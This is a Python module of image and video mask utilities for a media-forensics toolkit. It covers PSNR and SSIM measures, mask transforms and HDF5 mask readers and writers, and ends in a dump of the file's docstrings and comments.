matched_tuple = __findBestMatch(img2, img1)
analysis = {}
if matched_tuple is not None:
diffIm = img2[matched_tuple[0]:matched_tuple[2], matched_tuple[1]:matched_tuple[3]]
dst = np.abs(img1 - diffIm)
analysis['location'] = str((int(matched_tuple[0]), int(matched_tuple[1])))
gray_image = np.zeros(img1.shape).astype('uint8')
gray_image[dst > 0.0001] = 255
mask = gray_image
for k, v in img_analytics(img1, diffIm, mask=mask).iteritems():
analysis[k] = v
else:
mask = np.ones(img1.shape) * 255
return abs(255 - mask).astype('uint8'), analysis
def __colorPSNR(z1, z2, size=None):
if size == 0:
return 0.0
d = (z1 - z2) ** 2
sse = np.sum(d)
size = float(reduce(lambda x, y: x * y, d.shape)) if size is None else float(size)
mse = float(sse) / size
return 0.0 if mse == 0.0 else 20.0 * math.log10(255.0 / math.sqrt(mse))
def sizeDiff(z1, z2):
"""
z1 and z2 are expected to be PIL images
"""
# size is (width, height) for PIL Images, the opposite of numpy array shapes
return str((int(z2.size[1] - z1.size[1]), int(z2.size[0] - z1.size[0])))
def invertMask(mask):
return mask.invert()
def convertToMask(im):
"""
Takes an image and produces a mask in which pure-white pixels remain white and all other pixels become black
"""
return im.to_mask()
def __checkInterpolation(val):
validVals = ['nearest', 'lanczos', 'bilinear', 'bicubic', 'cubic']
return val if val in validVals else 'nearest'
def applyMask(image, mask, value=0):
if mask.shape != image.shape:
mask = cv2.resize(mask, (image.shape[1], image.shape[0]))
image = np.copy(image)
image[mask == 0] = value
return image
def carveMask(image, mask, expectedSize):
"""
Trim a mask after seam carving
:param image:
:param mask:
:param expectedSize:
:return:
"""
newimage = np.zeros(expectedSize).astype('uint8')
if expectedSize[0] == mask.shape[0]:
for x in range(expectedSize[0]):
topaste = image[x, mask[x, :] == 255]
if (len(topaste)) <= newimage.shape[1]:
newimage[x, 0:len(topaste)] = topaste
else:
newimage[x, :] = topaste[0:len(topaste)]
elif expectedSize[1] == mask.shape[1]:
for y in range(expectedSize[1]):
topaste = image[mask[:, y] == 255, y]
if (len(topaste)) <= newimage.shape[0]:
newimage[0:len(topaste), y] = topaste
else:
newimage[:, y] = topaste[0:len(topaste)]
else:
return applyMask(image, mask)
return newimage
def alterMask(compositeMask,
edgeMask,
rotation=0.0,
targetShape=(0, 0),
interpolation='nearest',
location=(0, 0),
transformMatrix=None,
flip=None,
crop=False,
cut=False):
res = compositeMask
# rotation may change the shape
# transforms typical are created for local operations (not entire image)
if location != (0, 0) or crop:
if targetShape != res.shape:
# inverse crop
newRes = np.zeros(targetShape).astype('uint8')
upperBound = (min(res.shape[0] + location[0], newRes.shape[0]),
min(res.shape[1] + location[1], newRes.shape[1]))
newRes[location[0]:upperBound[0], location[1]:upperBound[1]] = res[0:(upperBound[0] - location[0]),
0:(upperBound[1] - location[1])]
res = newRes
else:
upperBound = (min(res.shape[0], targetShape[0] + location[0]),
min(res.shape[1], targetShape[1] + location[1]))
res = res[location[0]:upperBound[0], location[1]:upperBound[1]]
if transformMatrix is not None and not cut and flip is None:
res = applyTransformToComposite(compositeMask, edgeMask, transformMatrix)
elif abs(rotation) > 0.001:
if targetShape != res.shape or abs(rotation) % 90 < 0.001:
res = __rotateImage(rotation, compositeMask,
expectedDims=targetShape,
cval=0)
else:
res = applyRotateToComposite(rotation, res,
edgeMask,
targetShape)
# if transform matrix provided and alternate path is taken above
if flip is not None:
res = applyFlipComposite(res, edgeMask, flip)
if cut:
res = applyMask(res, edgeMask)
if targetShape != res.shape:
res = applyResizeComposite(res, targetShape)
return res
def alterReverseMask(donorMask, edgeMask, rotation=0.0, location=(0, 0),
transformMatrix=None, flip=None, crop=False, cut=False, targetShape=None):
res = donorMask
# if we are cutting, then we do not want to use the edge mask as the mask for the transformation.
# see the cut section below, where the transform occurs directly on the mask
# this occurs in donor cases
if ((location != (0, 0) or crop) and not cut):
if targetShape != donorMask.shape:
# inverse crop
upperBound = (min(res.shape[0], targetShape[0] + location[0]),
min(res.shape[1], targetShape[1] + location[1]))
res = res[location[0]:upperBound[0], location[1]:upperBound[1]]
else:
newRes = np.zeros(targetShape).astype('uint8')
upperBound = (res.shape[0] + location[0], res.shape[1] + location[1])
newRes[location[0]:upperBound[0], location[1]:upperBound[1]] = res[0:(upperBound[0] - location[0]),
0:(upperBound[1] - location[1])]
res = newRes
if transformMatrix is not None and not cut and flip is None:
res = applyTransform(res, mask=edgeMask, transform_matrix=transformMatrix, invert=True,
returnRaw=False)
elif abs(rotation) > 0.001:
res = __rotateImage(-rotation, res, expectedDims=targetShape, cval=0)
elif flip is not None:
res = applyFlipComposite(res, edgeMask, flip)
if cut:
# res is the donor mask
# edgeMask may be the overriding mask from a PasteSplice, thus in the same shape
# The transform will convert to the target mask size of the donor path.
res = applyMask(res, edgeMask)
if transformMatrix is not None:
res = cv2.warpPerspective(res, transformMatrix, (targetShape[1], targetShape[0]),
flags=cv2.WARP_INVERSE_MAP,
borderMode=cv2.BORDER_CONSTANT, borderValue=0).astype('uint8')
# need to use the target size since the expected size does not align with the donor paths.
if targetShape != res.shape:
res = cv2.resize(res, (targetShape[1], targetShape[0]))
return res
def __toMask(im):
"""
Performs the same functionality as convertToMask, but takes and returns an np array
"""
if len(im.shape) < 3:
return im
imGray = cv2.cvtColor(im, cv2.COLOR_RGB2GRAY)
gray_image = np.ones(imGray.shape).astype('uint8')
gray_image[imGray < 255] = 0
gray_image *= 255
if im.shape[2] == 4:
gray_image[im[:, :, 3] == 0] = 255
return gray_image
def mergeColorMask(compositeMaskArray, newMaskArray):
matches = np.any(newMaskArray != [255, 255, 255], axis=2)
compositeMaskArray[matches] = newMaskArray[matches]
return compositeMaskArray
def mergeMask(compositeMask, newMask, level=0):
if compositeMask.shape != newMask.shape:
compositeMask = cv2.resize(compositeMask, (newMask.shape[1], newMask.shape[0]))
newMask = ImageWrapper(newMask).to_mask().to_array()
else:
compositeMask = np.copy(compositeMask)
compositeMask[newMask == 0] = level
return compositeMask
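# Illustrative sketch (not part of the original module): mergeMask stamps the given level
# into the composite wherever the new mask is black (i.e. where a change was detected).
def _example_merge_mask():
    composite = np.zeros((8, 8), dtype=np.uint8)
    new_mask = np.full((8, 8), 255, dtype=np.uint8)
    new_mask[2:4, 2:4] = 0  # changed region
    return mergeMask(composite, new_mask, level=7)  # level 7 appears in rows/cols 2..3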
def ssim(X, Y, MASK, **kwargs):
from scipy.ndimage import gaussian_filter
K1 = kwargs.pop('K1', 0.01)
R = kwargs.pop('R', 255)
K2 = kwargs.pop('K2', 0.03)
sigma = kwargs.pop('sigma', 1.5)
X = X.astype(np.float64)
Y = Y.astype(np.float64)
win_size = 1
cov_norm = 1.0  # population covariance to match Wang et al. 2004
filter_func = gaussian_filter
filter_args = {'sigma': sigma}
# compute (weighted) means
ux = filter_func(X, **filter_args)
uy = filter_func(Y, **filter_args)
# compute (weighted) variances and covariances
uxx = filter_func(X * X, **filter_args)
uyy = filter_func(Y * Y, **filter_args)
uxy = filter_func(X * Y, **filter_args)
vx = cov_norm * (uxx - ux * ux)
vy = cov_norm * (uyy - uy * uy)
vxy = cov_norm * (uxy - ux * uy)
C1 = (K1 * R) ** 2
C2 = (K2 * R) ** 2
A1, A2, B1, B2 = ((2 * ux * uy + C1,
2 * vxy + C2,
ux ** 2 + uy ** 2 + C1,
vx + vy + C2))
D = B1 * B2
S = ((A1 * A2) / D) * MASK
# compute (weighted) mean of ssim
return S.mean()
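# Illustrative sketch (not part of the original module): the MASK argument weights the
# per-pixel SSIM map, so identical inputs under a mask of ones score approximately 1.0.
def _example_ssim():
    a = np.random.randint(0, 255, (32, 32)).astype(np.float64)
    weights = np.ones((32, 32))
    return ssim(a, a, weights)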
def img_analytics(z1, z2, mask=None):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
result = {'psnr': __colorPSNR(z1, z2)}
if mask is not None:
mask = np.copy(mask)
mask[mask > 0] = 1
result.update({'local psnr': __colorPSNR(z1 * mask, z2 * mask, size=sumMask(mask))})
return result
def __diffMask(img1, img2, invert, args=None):
itype = np.iinfo(img1.dtype)
dst = np.abs(np.subtract(img1.astype('int32'), img2.astype('int32')))
gray_image = np.zeros(img1.shape).astype('uint8')
difference = float(args['tolerance']) if args is not None and 'tolerance' in args else 0.0001
difference = difference * (itype.max - itype.min)
gray_image[dst > difference] = 255
analysis = img_analytics(img1, img2, mask=gray_image)
return (gray_image if invert else (255 - gray_image)), analysis
def coordsFromString(value):
import re
value = re.sub('[\(\)\,]', ' ', value)
vals = [int(float(v)) for v in value.split(' ') if v != ' ' and v != '']
return tuple(vals)
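# Illustrative sketch (not part of the original module): coordsFromString strips
# parentheses and commas and returns the remaining numbers as a tuple of ints.
def _example_coords_from_string():
    return coordsFromString('(12, 34)')  # -> (12, 34)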
def fixTransparency(img):
return img.apply_transparency()
def dictDeepUpdate(aDictionary, aPartialDictionary):
for k, v in aPartialDictionary.iteritems():
if k in aDictionary and type(v) == dict:
dictDeepUpdate(aDictionary[k], v)
else:
aDictionary[k] = v
def grayToRGB(frame):
"""
Project the gray channel into the green channel of an RGB image
"""
result = np.zeros((frame.shape[0], frame.shape[1], 3))
if len(frame.shape) == 2:
result[:, :, 1] = frame
else:
summary = np.zeros((frame.shape[0], frame.shape[1]))
for d in range(frame.shape[2]):
summary[:, :] += frame[:, :, d]
summary[summary > 0] = 255
result[:, :, 1] = summary
return result.astype('uint8')
def composeVideoMaskName(maskprefix, starttime, suffix):
"""
:param maskprefix:
:param starttime:
:param suffix:
:return: A mask file name using the provided components
"""
if maskprefix.endswith('_mask_' + str(starttime)):
return maskprefix + '.' + suffix
return maskprefix + '_mask_' + str(starttime) + '.' + suffix
def convertToVideo(filename, preferences=None, start_frame=None, start_time=0):
suffix = '.' + preferredSuffix(preferences=preferences)
fn = os.path.splitext(filename)[0] + (str(start_frame) if start_frame is not None else '') + suffix
if os.path.exists(fn):
if os.stat(filename).st_mtime < os.stat(fn).st_mtime:
return fn
else:
os.remove(fn)
reader = GrayBlockReader(filename,
convert=True,
preferences=preferences,
start_frame=start_frame,
start_time=start_time)
while True:
mask = reader.read()
if mask is None:
break
fn = reader.writer.filename
return fn
executions = {}
def cancel_execute(worker_func):
if worker_func in executions:
executions[worker_func].cancel()
def execute_every(interval, worker_func, start=True, **kwargs):
executions[worker_func] = threading.Timer(
interval,
execute_every, [interval, worker_func, False], kwargs)
executions[worker_func].start()
if not start:
worker_func(**kwargs)
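# Illustrative sketch (not part of the original module): execute_every re-arms a timer so
# worker_func runs repeatedly until cancel_execute is called. The heartbeat function and
# interval below are hypothetical.
def _example_execute_every():
    def heartbeat(message='tick'):
        logging.getLogger('maskgen').debug(message)
    execute_every(60.0, heartbeat, message='still alive')
    # ... later, stop the repeating timer ...
    cancel_execute(heartbeat)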
class GrayBlockFrameFirstLayout():
name = 'framefirst'
@staticmethod
def is_end(reader):
return reader.pos >= reader.dset.shape[0]
@staticmethod
def count(reader):
return reader.dset.shape[0]
@staticmethod
def get_frame(reader):
return reader.dset[reader.pos]
@staticmethod
def initial_shape(shape, size = None):
return (size,) + shape
@staticmethod
def resize(shape, writer):
if writer.dset.shape[0] < (writer.pos + 1):
writer.dset.resize((writer.pos + 1,) + writer.dset.shape[1:])
@staticmethod
def set(writer,mask):
writer.dset[ writer.pos] = mask
class GrayBlockFrameLastLayout():
name = 'framelast'
@staticmethod
def is_end(reader):
return reader.pos >= reader.dset.shape[-1]
@staticmethod
def count(reader):
return reader.dset.shape[-1]
@staticmethod
def get_frame(reader):
return reader.dset[:, :, reader.pos]
@staticmethod
def initial_shape(shape, size=None):
return (shape)[:-1] + (size,)
@staticmethod
def resize(shape, writer):
if writer.dset.shape[-1] < (writer.pos + 1):
writer.dset.resize((shape)[:-1] + (writer.pos + 1,))
@staticmethod
def set(writer,mask):
if len(writer.dset.shape) == 2:
writer.dset[:, :, writer.pos] = mask
else:
writer.dset[:, :, :, writer.pos] = mask
class GrayBlockReader:
def __init__(self, filename,
convert=False,
preferences=None,
start_time=0,
start_frame=None,
end_frame=None):
import h5py
self.writer = None
self.start_frame = start_frame
self.start_time = start_time
self.preferences = preferences
self.filename = filename
self.h_file = h5py.File(filename, 'r')
grp_names = self.h_file.keys()
if 'masks' in grp_names:
self.grps = ['masks']
self.setter = OldFormatGroupSetter()
else:
self.setter = NewFormatGroupSetter()
self.grps = [str(x) for x in sorted([int(x) for x in grp_names])]
# group selection
self.grp_pos = 0
# frame selection in group (relative to start of group)
self.pos = 0
# the smart numpy array
self.dset = None
# where to stop
self.end_frame = end_frame
self.fps = self.h_file.attrs['fps']
self.mask_format = MASKFORMATS[
self.h_file.attrs['mask_format'] if 'mask_format' in self.h_file.attrs else GrayBlockFrameFirstLayout.name]
self.setter.set_group(self, start_time=start_time, start_frame=start_frame, end_frame=end_frame)
self.convert = convert
self.writer = GrayFrameWriter(os.path.splitext(filename)[0],
self.fps,
preferences=preferences) if self.convert else DummyWriter()
def create_writer(self):
"""
:return:
@rtype: GrayBlockWriter
"""
import time
dir = os.path.dirname(self.filename)
prefix = os.path.join(dir,os.path.basename(self.h_file.attrs['prefix'])) if 'prefix' in self.h_file.attrs else os.path.splitext(self.filename)[0][:48]
return GrayBlockWriter(prefix + str(time.clock()), self.fps)
def set_group(self, start_frame=None, start_time=1, end_frame=None):
self.setter.set_group(self, start_frame=start_frame,start_time=start_time, end_frame=end_frame)
def current_frame_time(self):
return self.start_time + (self.pos * (1000 / self.fps))
def current_frame(self):
return self.start_frame + self.pos
def length(self):
return self.mask_format.count(self)
def read(self):
if self.dset is None:
return None
if self.end_frame is not None and self.current_frame() == self.end_frame + 1:
return None
if self.mask_format.is_end(self):
self.grp_pos+=1
if self.grp_pos < len(self.grps):
self.setter.select_group(self, self.grp_pos)
else:
self.dset = None
return None
mask = self.mask_format.get_frame(self)
mask = mask.astype('uint8')
self.writer.write(mask, self.start_frame + self.pos, self.current_frame_time())
self.pos += 1
return mask
def release(self):
pass
def close(self):
self.h_file.close()
if self.writer is not None:
self.writer.close()
MASKFORMATS = {GrayBlockFrameFirstLayout.name:GrayBlockFrameFirstLayout(),
GrayBlockFrameLastLayout.name:GrayBlockFrameLastLayout()}
class GrayBlockReaderManager:
def __init__(self, reader_type= GrayBlockReader):
self.reader_type = reader_type
self.reader = None
self.filename = None
def create_reader(self, filename,
start_frame=None,
start_time=0,
end_frame=None):
"""
:param filename:
:param start_frame:
:param start_time:
:param end_frame: optional stopping point
:return:
@type filename: str
@rtype: GrayBlockReader
"""
if filename == self.filename:
self.reader.set_group(start_frame=start_frame,
start_time=start_time,
end_frame=end_frame)
else:
if self.reader is not None:
self.reader.close()
self.filename = filename
self.reader = self.reader_type(filename,
start_frame=start_frame,
start_time=start_time,
end_frame=end_frame)
return self.reader
def close(self):
if self.reader is not None:
self.reader.close()
self.reader = None
class GrayBlockWriterManager:
def __init__(self):
self.writer = None
def create_writer(self, reader):
"""
:param reader:
:return:
@type reader: GrayBlockReader
@rtype: GrayBlockWriter
"""
if self.writer is not None:
return self.writer
self.writer= reader.create_writer()
return self.writer
def close(self):
if self.writer is not None:
self.writer.close()
self.writer = None
class NewFormatGroupSetter:
"""
Multiple mask segments per HDF5 file, one in each group.
"""
@staticmethod
def set_group(reader, start_frame=None, start_time=1,end_frame=None):
"""
:param start_frame:
:param start_time:
:return:
@type reader: GrayBlockReader
"""
grp_pos = 0
if start_frame is not None:
pos = len([x for x in reader.grps if int(x) <= start_frame]) - 1
grp_pos = pos if pos > 0 else grp_pos
NewFormatGroupSetter.select_group(reader,
grp_pos,
start_frame=start_frame,
start_time=start_time,
end_frame=end_frame)
@staticmethod
def select_group(reader,
grp_pos,
start_frame=None,
start_time=0,
end_frame=None):
"""
:param reader:
:param grp_pos:
:param start_frame:
:param start_time:
:param end_frame: determine end frame
:return:
"""
reader.grp_pos = grp_pos
reader.current_group = reader.h_file.get(reader.grps[grp_pos])
reader.dset = reader.current_group.get('masks')
reader.start_time = reader.current_group.attrs[
'start_time'] if 'start_time' in reader.current_group.attrs else start_time
reader.start_frame = reader.current_group.attrs[
'start_frame'] if 'start_frame' in reader.current_group.attrs else start_frame
end_frame = reader.current_group.attrs[
'end_frame'] if 'end_frame' in reader.current_group.attrs and end_frame is None else end_frame
reader.end_frame = end_frame if end_frame is not None else None
reader.pos = 0 if start_frame is None else reader.start_frame - start_frame
class OldFormatGroupSetter:
"""
One Mask Segment per HDF5 File.
"""
@staticmethod
def set_group(reader, start_frame=None, start_time=0, end_frame=None):
"""
:param start_frame:
:param start_time:
:return:
@type reader: GrayBlockReader
"""
reader.current_group = reader.h_file.get('masks')
reader.dset = reader.current_group.get('masks')
reader.start_time = reader.h_file.attrs[
'start_time'] if 'start_time' in reader.h_file.attrs else start_time
reader.start_frame = reader.h_file.attrs[
'start_frame'] if 'start_frame' in reader.h_file.attrs else start_frame
reader.pos = 0 if start_frame is None else reader.start_frame - start_frame
@staticmethod
def select_group(reader, grp_pos, start_frame=None, start_time=0,end_frame=None):
OldFormatGroupSetter.set_group(reader,start_frame=start_frame,start_time=start_time)
def compose_overlay_name(target_file="", link = tuple()):
path_tuple = os.path.split(target_file)
return os.path.join(path_tuple[0], path_tuple[1] + str(hash(link))[:5] + '_overlay.' + preferredSuffix())
class GrayBlockOverlayGenerator:
def __init__(self, locator, segments = [], target_file = None, output_file = ""):
from video_tools import get_frames_from_segment
self.target_file = target_file
self.output_file = output_file
segments = [segment for segment in segments if segment.media_type == 'video' and segment.filename is not None]
self.segments = sorted(segments, key=lambda segment: segment.startframe)
self.segment_index = 0
self.segment = self.segments[self.segment_index]
self.readerManager = GrayBlockReaderManager()
self.reader = self.readerManager.create_reader(
filename=self.segment.filename,
start_time=self.segment.starttime,
start_frame=self.segment.startframe,
end_frame=self.segment.endframe)
self.overlay_mask_name = os.path.join(os.path.split(self.segment.filename)[0], '_overlay')
self.writer = GrayFrameOverlayWriter(
mask_prefix=self.overlay_mask_name,
fps=self.reader.fps)
self.last_frame = get_frames_from_segment(locator.getMaskSetForEntireVideo()[0])
def updateSegment(self):
self.segment_index += 1
self.segment = self.segments[self.segment_index]
self.reader = self.readerManager.create_reader(
filename=self.segment.filename,
start_time=self.segment.starttime,
start_frame=self.segment.startframe,
end_frame=self.segment.endframe)
def generate(self):
while self.writer.lastPos < self.last_frame:
frame_time = self.reader.current_frame_time()
frame_count = self.reader.current_frame()
mask = self.reader.read()
if mask is None:
if self.segment_index + 1 < len(self.segments):
self.updateSegment()
else:
frame_count = self.last_frame #write blanks for the rest
self.writer.write(mask, frame_count, frame_time)
self.writer.close()
self.readerManager.close()
ffmpeg_overlay(self.target_file, self.writer.filename, self.output_file)
try:
os.remove(self.writer.filename) #clean up the mask file, leave the finished overlay
except OSError:
pass
class DummyWriter:
def write(self, mask, mask_number, mask_time):
pass
def close(self):
pass
class GrayBlockWriter:
"""
Write Gray scale (Mask) images to a compressed block file
"""
def __init__(self, mask_prefix, fps, layout=GrayBlockFrameFirstLayout()):
self.fps = fps
self.dset = None
self.pos = 0
self.h_file = None
self.suffix = 'hdf5'
self.filename = None
self.mask_prefix = mask_prefix
self.mask_format = layout
self.last_frame = 1
self.last_time = 0
self.current_group = None
def write(self, mask, mask_time, frame_number):
import h5py
if self.current_group is not None and frame_number - self.last_frame > 1:
grp = self.current_group
grp.attrs['end_time'] = self.last_time
grp.attrs['end_frame'] = self.last_frame
self.current_group = None
if self.h_file is None:
self.filename = composeVideoMaskName(self.mask_prefix, mask_time, self.suffix)
logging.getLogger('maskgen').info('Writing to ' + self.filename)
if os.path.exists(self.filename):
os.remove(self.filename)
self.h_file = h5py.File(self.filename, 'w')
self.h_file.attrs['fps'] = self.fps
self.h_file.attrs['prefix'] = os.path.basename(self.mask_prefix)
self.h_file.attrs['mask_format'] = self.mask_format.name
self.current_group = None
if self.current_group is None:
self.current_group = self.h_file.create_group(str(frame_number))
grp = self.current_group
grp.attrs['start_time'] = mask_time
grp.attrs['start_frame'] = frame_number
self.dset = grp.create_dataset("masks",
self.mask_format.initial_shape(mask.shape, size=10),
compression="gzip",
chunks=True,
maxshape=self.mask_format.initial_shape(mask.shape))
self.pos = 0
self.mask_format.resize(mask.shape, self)
self.last_frame = frame_number
self.last_time = mask_time
self.mask_format.set(self, mask)
self.pos += 1
def get_file_name(self):
return self.filename
def close(self):
self.release()
def release(self):
if self.current_group is not None:
self.current_group.attrs['end_time'] = self.last_time
self.current_group.attrs['end_frame'] = self.last_frame
self.current_group = None
self.dset = None
if self.h_file is not None:
self.h_file.close()
self.h_file = None
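# Illustrative sketch (not part of the original module): round-trip a few masks through
# GrayBlockWriter and GrayBlockReader. The prefix and fps values are hypothetical.
def _example_gray_block_round_trip():
    writer = GrayBlockWriter('example_masks', 29.97)
    for frame in range(1, 4):
        mask = np.random.randint(0, 2, (64, 64)).astype('uint8') * 255
        writer.write(mask, frame * 1000.0 / 29.97, frame)
    writer.close()
    reader = GrayBlockReader(writer.get_file_name())
    frames = []
    while True:
        mask = reader.read()
        if mask is None:
            break
        frames.append(mask)
    reader.close()
    return len(frames)  # expected: 3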
def preferredSuffix(preferences=None):
import sys
default_suffix = 'm4v'
if sys.platform.startswith('win'):
default_suffix = 'avi'
if sys.platform.startswith('linux'):
default_suffix = 'avi'
if preferences is not None:
t_suffix = getValue(preferences,'vid_suffix')
default_suffix = t_suffix if t_suffix is not None else default_suffix
return default_suffix
class GrayBlockFactory:
"""
Either build the Writer or the Validator
"""
def __init__(self, writer =None):
self.writer = writer
def __call__(self, name, fps):
return GrayBlockWriter(mask_prefix=name, fps=fps) if self.writer is None else self.writer
class GrayBlockValidator():
"""
Compare frames of two video masks to see if one is valid.
"""
def __init__(self, jt_mask_file, validation_function):
self.filename = jt_mask_file
self.failed_frames = []
self.manager = GrayBlockReaderManager()
self.validation_function = validation_function
self.manager.create_reader(jt_mask_file)
def write(self, mask, mask_time, frame_number):
while(self.manager.reader.current_frame() < frame_number):
self.manager.reader.read() #ffwd to where we want to be
if self.manager.reader.current_frame() == frame_number:
jt_mask = self.manager.reader.read()
if jt_mask is not None:
if not self.validation_function(jt_mask,mask):
self.failed_frames.append(frame_number)
def get_file_name(self):
return self.filename
class GrayFrameWriter:
"""
Write Gray scale (Mask) video images
"""
capOut = None
codec = 'AVC1'
suffix = 'm4v'
fourcc = None
filename = None
fps = 0
mask_prefix = None
def __init__(self, mask_prefix, fps, preferences=None):
import sys
self.fps = fps
self.mask_prefix = mask_prefix
self.suffix = preferredSuffix(preferences=preferences)
t_codec = None
if preferences is not None and 'vid_codec' in preferences:
t_codec = preferences['vid_codec']
if t_codec is None and sys.platform.startswith('win'):
self.codec = 'XVID'
elif t_codec is None and sys.platform.startswith('linux'):
self.codec = 'XVID'
elif t_codec is not None:
self.codec = str(t_codec)
self.fourcc = cv2api.cv2api_delegate.get_fourcc(self.codec) if self.codec != 'raw' else 0
def write(self, mask, mask_number, mask_time):
if self.capOut is None:
self.filename = composeVideoMaskName(self.mask_prefix, mask_time, self.suffix)
logging.getLogger('maskgen').info('writing using fourcc ' + str(self.fourcc))
if os.path.exists(unicode(os.path.abspath(self.filename))):
os.remove(unicode(os.path.abspath(self.filename)))
self.capOut = cv2.VideoWriter(unicode(os.path.abspath(self.filename)),
self.fourcc,
self.fps,
(mask.shape[1], mask.shape[0]),
len(mask.shape) > 2 and mask.shape[2] > 1)
if cv2.__version__.startswith('2.4.11'):
mask = grayToRGB(mask)
self.capOut.write(mask)
def close(self):
if self.capOut is not None:
self.capOut.release()
self.capOut = None
def release(self):
self.close()
class GrayFrameOverlayWriter(GrayFrameWriter):
def __init__(self, mask_prefix = '', fps = 30/1, preferences = None):
GrayFrameWriter.__init__(self, mask_prefix=mask_prefix, fps=fps, preferences = preferences)
self.lastPos = 0
self.blankMask = None
def write(self, mask, mask_number, mask_time):
if self.blankMask is None:
self.blankMask = np.ones((mask.shape[0], mask.shape[1]), dtype=np.uint8) * 255
frames_to_write = mask_number - self.lastPos #write all the frames up to and including the mask frame
for i in range(1,frames_to_write+1):
frame_num = self.lastPos + i
mask_time = frame_num * 1000.0 / self.fps #refigure time for the frame we actually write
GrayFrameWriter.write(self,
mask=mask if frame_num == mask_number and mask is not None else self.blankMask,
mask_number=frame_num,
mask_time=mask_time)
self.lastPos = mask_number
def widthandheight(img):
a = np.where(img != 0)
if len(a[0]) == 0:
return 0, 0, 0, 0
bbox = np.min(a[0]), np.max(a[0]), np.min(a[1]), np.max(a[1])
h, w = bbox[1] - bbox[0], bbox[3] - bbox[2]
return bbox[2], bbox[0], w, h
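# Illustrative sketch (not part of the original module): widthandheight returns the
# bounding box of the non-zero region as (x, y, width, height).
def _example_widthandheight():
    img = np.zeros((50, 80), dtype=np.uint8)
    img[10:20, 30:45] = 255
    return widthandheight(img)  # -> (30, 10, 14, 9)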
def place_in_image(mask, image_to_place, image_to_cover, placement_center, rect=None):
x, y, w, h = widthandheight(mask)
if rect:
if w > rect[2]:
x = x + (w - rect[2]) / 2
w = rect[2]
if h > rect[3]:
y = y + (h - rect[3]) / 2
h = rect[3]
w += w % 2
h += h % 2
x_offset = int(placement_center[0]) - int(math.floor(w / 2))
y_offset = int(placement_center[1]) - int(math.floor(h / 2))
if y_offset < 0:
return None
if x_offset < 0:
return None
image_to_cover = np.copy(image_to_cover)
flipped_mask = 255 - mask
for c in range(0, 3):
image_to_cover[y_offset:y_offset + h, x_offset:x_offset + w, c] = \
image_to_cover[y_offset:y_offset + h, x_offset:x_offset + w, c] * \
(flipped_mask[y:y + h, x:x + w] / 255) + \
image_to_place[y:y + h, x:x + w, c] * \
(mask[y:y + h, x:x + w] / 255)
return image_to_cover
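# --- Hedged worked example (editor addition) for widthandheight ---
# widthandheight returns the top-left corner and extent of the non-zero region of a mask.
# Note the width/height are max-min differences (a single non-zero pixel reports w == h == 0),
# which is how place_in_image above slices both the mask and the image to place.
import numpy as np

def bounding_box_demo():
    demo_mask = np.zeros((10, 10), dtype=np.uint8)
    demo_mask[2:5, 3:8] = 255  # rows 2-4 and columns 3-7 are selected
    x, y, w, h = widthandheight(demo_mask)
    return x, y, w, h  # (3, 2, 4, 2): x=min column, y=min row, w=7-3, h=4-2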
def selfVideoTest():
logging.getLogger('maskgen').info('Checking opencv and ffmpeg, this may take a minute.')
writer = GrayBlockWriter('test_ts_gw', 29.97002997)
mask_set = list()
for i in range(255):
mask = np.random.randint(255, size=(1090, 1920)).astype('uint8')
mask_set.append(mask)
        writer.write(mask, (i + 1) * 33.3666666667, i + 1)
writer.close()
fn = writer.get_file_name()
vidfn = convertToVideo(fn)
if not os.path.exists(vidfn):
return 'Video Writing Failed'
try:
size = openImage(vidfn, getMilliSecondsAndFrameCount('00:00:01')).size
if size != (1920, 1090):
return 'Video Writing Failed: Frame Size inconsistent'
except:
return 'Video Writing Failed'
return None
def dateTimeStampCompare(v1, v2):
def get_defaults(source):
exifdata = maskgen.exif.getexif(source)
rd = {}
for e in exifdata:
if "date" in str(e).lower() or "time" in str(e).lower():
rd[e] = exifdata[e]
return rd
#date_time_stamp = exifdata['Create Date'] if 'Create Date' in exifdata else exifdata['File Creation Date/Time']
stamp1 = get_defaults(v1)
rgexdict = {}
for e in stamp1:
st = stamp1[e]
rgexf = "\\A"
for x in st:
if x.isdigit():
rgexf += '[0-9]'
elif x.isalpha():
                rgexf += '[a-zA-Z]*'
else:
rgexf += x
rgexf+= "\\Z"
rgexdict[e] = rgexf
stamp2 = get_defaults(v2)
nonmatches = []
for e in stamp2:
if e in rgexdict:
mo = re.match(rgexdict[e],stamp2[e])
if mo is None:
nonmatches.append(e)
else:
pass
#nonmatches.append(e)
return nonmatches | en | 0.670983 | # ============================================================================= # Authors: PAR Government # Organization: DARPA # # Copyright (c) 2016 PAR Government # All rights reserved. # ============================================================================== # To simplify we'll assume this is hooked up # to a single filename. # ['./icons'] :return: The last roll over log file Return: True if the file types of the two provided files do not match Open a file using a native OS associated program :param img: :param dim: :return: @rtype: ImageWrapper Preserves the dimension ratios_ :param dim: :param otherImDim: dimensions of other image :return: Resized relative to width given the maximum constraints @rtype: ImageWrapper Coordinates are [x,y] or (x,y) or x,y where x and y are integers. Return False if the coordinates are invalid. frameCountWhenStarted: record the frame at start frameCountWhenStopped: record the frame at finish #if startTimeandFrame is not None and startTimeandFrame[1] > 0 and startTimeandFrame[0] > 0: # self.startTimeandFrame = (startTimeandFrame[0],startTimeandFrame[1]+1) #if stopTimeandFrame is not None and stopTimeandFrame[1] > 0 and stopTimeandFrame[0] > 0: # self.stopTimeandFrame = (stopTimeandFrame[0],stopTimeandFrame[1]+1) :param milliNow: time after the frame is to be displayed or sound emitted :param frames: :return: calculation duration Validate a typed operation argument return the type converted argument if necessary raise a ValueError if invalid Convert milliseconds to 'HH:MM:SS.FFF' #self.names = [] #TODO: check names, what else #TODO: check names, what else Open and return an image from the file. If the file is a video, find the first non-uniform frame. videoFrameTime, integer time in milliseconds, is provided, then find the frame after that point in time preserveSnapshot, False by default, informs the function to save the frame image after extraction for videos :param mask: :param img1: :param img2: :param invert: :param arguments: :return: @type mask: ImageWrapper @type img2: ImageWrapper @type img1: ImageWrapper Produce a intensity_map that redistributes the intensity values found in the edge_map evenly over 1 to 255 :param edge_map contains a map between an edge identifier (s,e) and an intensity value from 1 to 255 and possibly a color :return map of intensity value from edge map to a replacement intensity value @type edge_map {(str,str): (int,[])} #im = np.zeros((500,500,3)).astype('uint8') #pos = 0 #for i in intensity_map: # im[pos,:] = i # pos+=1 #ImageWrapper(im).save('foo.png') Create a new image setting all white to the color and all black to white. :param img: :param color: :return: @type img: ImageWrapper @rtype ImageWrapper Produce an image that changes gray scale to color. First, set the intensity values of each pixel using the intensity value from the intensity map Then use a color map to build a color image Then repopulate the edge_map with the assigned color for each edge :param img gray scale image :param intensity_map intensity value mapped to its replacement 